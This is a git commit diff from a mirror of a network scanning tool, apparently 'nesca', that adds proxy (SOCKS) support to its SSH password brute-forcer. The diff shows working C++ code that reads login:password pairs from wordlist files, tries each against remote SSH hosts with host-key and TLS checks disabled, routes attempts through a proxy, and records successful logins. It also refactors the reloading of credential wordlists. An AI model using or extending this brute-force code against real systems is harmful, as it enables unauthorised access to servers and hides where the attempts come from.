mirror of
https://github.com/ChronosX88/nesca.git
synced 2024-11-23 10:42:21 +00:00
Partially implemented ssh over socks
This commit is contained in:
parent
a17df57d90
commit
ff816f4645
@ -416,7 +416,6 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
|
||||
long sz = getFileSize(fileName);
|
||||
|
||||
if(sz != *szPtr) {
|
||||
|
||||
FileUpdater::lk = std::unique_lock<std::mutex> (FileUpdater::filesUpdatingMutex);
|
||||
*szPtr = sz;
|
||||
funcPtr();
|
||||
@ -428,13 +427,26 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
|
||||
|
||||
int FileUpdater::updateLists() {
|
||||
while(globalScanFlag) {
|
||||
updateList("negatives.txt", &oldNegLstSize, updateNegatives);
|
||||
updateList("login.txt", &oldLoginLstSize, updateLogin);
|
||||
updateList("pass.txt", &oldPassLstSize, updatePass);
|
||||
updateList("sshpass.txt", &oldSSHLstSize, updateSSH);
|
||||
updateList("wflogin.txt", &oldWFLoginLstSize, updateWFLogin);
|
||||
updateList("wfpass.txt", &oldWFPassLstSize, updateWFPass);
|
||||
|
||||
Sleep(60000);
|
||||
Sleep(60000);
|
||||
if(!globalScanFlag) break;
|
||||
loadOnce();
|
||||
}
|
||||
}
|
||||
|
||||
int FileUpdater::loadOnce() {
|
||||
updateList("negatives.txt", &oldNegLstSize, updateNegatives);
|
||||
updateList("login.txt", &oldLoginLstSize, updateLogin);
|
||||
updateList("pass.txt", &oldPassLstSize, updatePass);
|
||||
updateList("sshpass.txt", &oldSSHLstSize, updateSSH);
|
||||
updateList("wflogin.txt", &oldWFLoginLstSize, updateWFLogin);
|
||||
updateList("wfpass.txt", &oldWFPassLstSize, updateWFPass);
|
||||
}
|
||||
|
||||
void FileUpdater::FUClear() {
|
||||
oldNegLstSize = 0;
|
||||
oldLoginLstSize = 0;
|
||||
oldPassLstSize = 0;
|
||||
oldSSHLstSize = 0;
|
||||
oldWFLoginLstSize = 0;
|
||||
oldWFPassLstSize = 0;
|
||||
}
|
||||
|
@ -26,8 +26,8 @@ public:
|
||||
|
||||
public:
|
||||
static int updateLists();
|
||||
static void passLoginLoader();
|
||||
static void negativeLoader();
|
||||
static int loadOnce();
|
||||
static void FUClear();
|
||||
};
|
||||
|
||||
#endif // FILEUPDATER_H
|
||||
|
146
SSHAuth.cpp
146
SSHAuth.cpp
@ -1,54 +1,97 @@
|
||||
#include "SSHAuth.h"
|
||||
#include "FileUpdater.h"
|
||||
|
||||
int _sshConnect(char *user, char *pass, const char *host, int port)
|
||||
{
|
||||
int _sshConnect(const char *user, const char *pass, const char *host, int port) {
|
||||
|
||||
CURL *curl = curl_easy_init();
|
||||
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L);
|
||||
char hostStr[128] = {0};
|
||||
ZeroMemory(hostStr, sizeof(hostStr));
|
||||
strcpy(hostStr, user);
|
||||
strcat(hostStr, "@");
|
||||
strcat(hostStr, host);
|
||||
int sshTimeout = gTimeOut + 1;
|
||||
|
||||
ssh_session my_ssh_session = ssh_new();
|
||||
if (my_ssh_session == NULL)
|
||||
if (curl)
|
||||
{
|
||||
ssh_free(my_ssh_session);
|
||||
return -1;
|
||||
};
|
||||
curl_easy_setopt(curl, CURLOPT_URL, host);
|
||||
curl_easy_setopt(curl, CURLOPT_PORT, port);
|
||||
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
|
||||
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
|
||||
int proxyPort = std::atoi(gProxyPort);
|
||||
if(strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
|
||||
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
|
||||
curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
|
||||
} else {
|
||||
curl_easy_setopt(curl, CURLOPT_PROXY, "");
|
||||
}
|
||||
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
|
||||
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut);
|
||||
curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L);
|
||||
|
||||
ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, hostStr);
|
||||
ssh_options_set(my_ssh_session, SSH_OPTIONS_PORT, &port);
|
||||
ssh_options_set(my_ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
|
||||
ssh_options_set(my_ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
|
||||
ssh_options_set(my_ssh_session, SSH_OPTIONS_TIMEOUT, &(gTimeOut + 1));
|
||||
int res = curl_easy_perform(curl);
|
||||
|
||||
int rc = ssh_connect(my_ssh_session);
|
||||
socket_t sock;
|
||||
curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock);
|
||||
|
||||
if (rc != SSH_OK)
|
||||
{
|
||||
ssh_disconnect(my_ssh_session);
|
||||
ssh_free(my_ssh_session);
|
||||
++offlines;
|
||||
return -2;
|
||||
if(res != CURLE_OK) {
|
||||
curl_easy_cleanup(curl);
|
||||
++ssh;
|
||||
stt->doEmitionRedFoundData("[SSH]Cannot connect to: " + QString(host) + ":" + QString::number(port));
|
||||
return 0;
|
||||
}
|
||||
|
||||
if(sock != -1) {
|
||||
ssh_session ssh_session = ssh_new();
|
||||
if (ssh_session == NULL)
|
||||
{
|
||||
ssh_free(ssh_session);
|
||||
curl_easy_cleanup(curl);
|
||||
return -1;
|
||||
};
|
||||
|
||||
ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
|
||||
ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
|
||||
ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout);
|
||||
|
||||
//Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700
|
||||
res = ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock);
|
||||
|
||||
res = ssh_connect(ssh_session);
|
||||
|
||||
if (res != SSH_OK) //Offline
|
||||
{
|
||||
ssh_disconnect(ssh_session);
|
||||
ssh_free(ssh_session);
|
||||
curl_easy_cleanup(curl);
|
||||
++offlines;
|
||||
return -2;
|
||||
}
|
||||
else
|
||||
{
|
||||
res = ssh_userauth_password(ssh_session, NULL, pass);
|
||||
if (res != SSH_AUTH_SUCCESS)
|
||||
{
|
||||
ssh_disconnect(ssh_session);
|
||||
ssh_free(ssh_session);
|
||||
curl_easy_cleanup(curl);
|
||||
return -1;
|
||||
};
|
||||
};
|
||||
|
||||
ssh_disconnect(ssh_session);
|
||||
ssh_free(ssh_session);
|
||||
} else {
|
||||
stt->doEmitionRedFoundData("[SSH]Socket = -1 " + QString(host) + ":" + QString::number(port));
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
rc = ssh_userauth_password(my_ssh_session, NULL, pass);
|
||||
if (rc != SSH_AUTH_SUCCESS)
|
||||
{
|
||||
ssh_disconnect(my_ssh_session);
|
||||
ssh_free(my_ssh_session);
|
||||
return -1;
|
||||
};
|
||||
};
|
||||
ssh_disconnect(my_ssh_session);
|
||||
ssh_free(my_ssh_session);
|
||||
|
||||
curl_easy_cleanup(curl);
|
||||
++ssh;
|
||||
return 0;
|
||||
}
|
||||
|
||||
char _get_ssh_banner(const char *ip, int port)
|
||||
{
|
||||
char _get_ssh_banner(const char *ip, int port) {
|
||||
char recvBuff[256] = {0};
|
||||
std::string buffer;
|
||||
Connector::nConnect(ip, port, &buffer);
|
||||
@ -63,14 +106,17 @@ char _get_ssh_banner(const char *ip, int port)
|
||||
return *recvBuff;
|
||||
}
|
||||
|
||||
int check_ssh_pass(char *user, char *pass, char *userPass, const char *host, int port, std::string *buffer, const char *banner)
|
||||
{
|
||||
int check_ssh_pass(const char *user, const char *pass,
|
||||
const char *userPass, const char *host, int port,
|
||||
std::string *buffer, const char *banner) {
|
||||
int res = -1;
|
||||
if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host) + ":" + QString::number(port));
|
||||
if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(userPass) + "@" + QString(host) + ":" + QString::number(port));
|
||||
|
||||
res = _sshConnect(user, pass, host, port);
|
||||
|
||||
if(res == 0)
|
||||
{
|
||||
stt->doEmition_BAGreenData("[+] SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host));
|
||||
stt->doEmition_BAGreenData("[+] SSH: " + QString(userPass) + "@" + QString(host));
|
||||
buffer->append(userPass);
|
||||
buffer->append("@");
|
||||
buffer->append(host);
|
||||
@ -78,37 +124,31 @@ int check_ssh_pass(char *user, char *pass, char *userPass, const char *host, int
|
||||
buffer->append(banner);
|
||||
return 0;
|
||||
};
|
||||
|
||||
return res;
|
||||
}
|
||||
|
||||
int SSHBrute(const char* host, int port, std::string *buffer, const char *banner)
|
||||
{
|
||||
int SSHBrute(const char* host, int port, std::string *buffer, const char *banner) {
|
||||
char login[32] = {0};
|
||||
char pass[32] = {0};
|
||||
char temp[64] = {0};
|
||||
BruteUtils::BConInc();
|
||||
int sz = 0;
|
||||
char *ptr1 = 0;
|
||||
int res = -1;
|
||||
|
||||
for(int i = 0; i < MaxSSHPass; ++i)
|
||||
{
|
||||
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
|
||||
if(!globalScanFlag) break;
|
||||
strcpy(temp, sshlpLst[i]);
|
||||
ptr1 = strstr(temp, ":");
|
||||
|
||||
if (ptr1 == NULL) {
|
||||
stt->doEmitionRedFoundData("[SSH]Wrong format: " + QString(temp));
|
||||
return -1;
|
||||
}
|
||||
stt->doEmitionRedFoundData("[SSH]Wrong format: " + QString(temp));
|
||||
return -1;
|
||||
}
|
||||
|
||||
sz = ptr1 - temp;
|
||||
strncpy(login, temp, sz);
|
||||
strncpy(login, temp, ptr1 - temp);
|
||||
strcpy(pass, ptr1 + 1);
|
||||
|
||||
res = check_ssh_pass(login, pass, temp, host, port, buffer, banner);
|
||||
|
||||
ZeroMemory(login, sizeof(login));
|
||||
ZeroMemory(pass, sizeof(pass));
|
||||
ZeroMemory(temp, sizeof(temp));
|
||||
@ -116,18 +156,15 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
|
||||
if(res == 0)
|
||||
{
|
||||
if(i == 0) return -2; //Failhit
|
||||
BruteUtils::BConDec();
|
||||
return 1;
|
||||
}
|
||||
else if(res == -2)
|
||||
{
|
||||
BruteUtils::BConDec();
|
||||
return -2;
|
||||
};
|
||||
|
||||
Sleep(500);
|
||||
};
|
||||
BruteUtils::BConDec();
|
||||
return -1;
|
||||
}
|
||||
|
||||
@ -138,7 +175,10 @@ int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer)
|
||||
const char &banner = _get_ssh_banner(ip, port);
|
||||
if(strlen(&banner) > 0)
|
||||
{
|
||||
return SSHBrute(ip, port, buffer, &banner);
|
||||
BruteUtils::BConInc();
|
||||
int res = SSHBrute(ip, port, buffer, &banner);
|
||||
BruteUtils::BConDec();
|
||||
return res;
|
||||
};
|
||||
return -1;
|
||||
}
|
||||
|
@ -1825,7 +1825,7 @@ int startScan(char* args) {
|
||||
|
||||
stt->doEmitionIPRANGE(QString("--"));
|
||||
stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads));
|
||||
|
||||
FileUpdater::loadOnce();
|
||||
runAuxiliaryThreads();
|
||||
|
||||
if (gMode == 0)
|
||||
@ -2115,6 +2115,7 @@ int startScan(char* args) {
|
||||
}
|
||||
|
||||
void nCleanup(){
|
||||
FileUpdater::FUClear();
|
||||
Threader::cleanUp();
|
||||
curl_global_cleanup();
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user